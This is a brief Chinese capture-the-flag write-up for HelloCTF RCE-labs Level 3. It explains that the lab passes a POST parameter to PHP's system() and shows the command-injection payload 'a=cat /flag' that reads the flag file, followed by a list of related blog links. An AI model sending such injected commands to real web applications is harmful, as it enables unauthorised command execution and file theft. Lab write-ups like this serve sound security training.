HelloCTF [RCE-labs] Level 3 - 命令执行

开启靶场,打开链接:

这关代码跟level 1的区别是eval(_POST\['a'\]);变成了system(_POST'a');

system() 函数会通过软连接执行你输入的系统命令

POST传参:a=cat /flag

成功得到flag:

NSSCTF{b10b3661-b382-467e-86be-4c374fdd3e5f}

相关推荐
学逆向的28 分钟前
虚拟内存与物理内存
windows·网络安全·api·win32
小小小小钰儿1 小时前
2.1-Windows本地部署大模型
人工智能·windows·计算机·网络安全·操作系统·编程
菩提小狗1 小时前
每日安全情报报告 · 2026-10-01
网络安全·漏洞·cve·安全情报·每日安全
Eric772 小时前
塞梅普雷斯 如是说 (第二部/11.因果)
经验分享
个 人 练 习 生2 小时前
C++:模板初阶详解
开发语言·c++·经验分享·学习
aixingpan2 小时前
aixingpan.cn API开发文档:api_docs_bichart_natalvssecondary2接口指南
前端·php
AI4ELAB2 小时前
品茗科技,3431万收购了一家新加坡公司,刚刚完成首次交割
经验分享
東隅已逝,桑榆非晚3 小时前
priority_queue的介绍和使用
c++·经验分享·笔记·学习
乃嘿仔4 小时前
AI 热点日报 · 2026-10-01
开发语言·人工智能·php
三8445 小时前
Fastjson 漏洞学习笔记 · 03 · 经典利用链:TemplatesImpl 与 JdbcRowSetImpl
java·web安全·fastjson